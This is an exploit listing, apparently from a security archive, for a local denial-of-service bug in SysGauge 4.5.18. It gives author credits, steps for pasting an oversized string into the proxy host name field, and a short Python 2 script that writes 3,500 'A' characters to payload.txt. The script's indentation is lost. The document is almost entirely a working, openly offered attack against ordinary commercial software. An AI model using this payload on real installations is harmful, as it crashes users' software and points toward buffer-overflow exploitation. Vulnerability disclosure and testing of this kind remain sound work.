SysGauge 4.5.18 Denial Of Service

SysGauge version 4.5.18 local denial of service proof of concept exploit.


MD5 | 5febf36702e28dbe2633d19429fccc10

#!/usr/bin/python
############################################################################################
# Exploit Title : SysGauge v4.5.18 - Local Denial of Service #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sysgauge.com/ #
# Vulnerable Software : http://www.sysgauge.com/setups/sysgauge_setup_v4.5.18.exe #
# Note : SysGauge Pro and Ultimate v4.5.18 are also vulnerable #
# Steps to Reproduce : ~ Copy content of payload.txt #
# ~ Select Manual proxy configuration under Options->Proxy #
# ~ Paste content in 'Proxy Server Host Name' field and click Save #
############################################################################################

buffer = "A" * 3500

try:
f=open("payload.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

Related Posts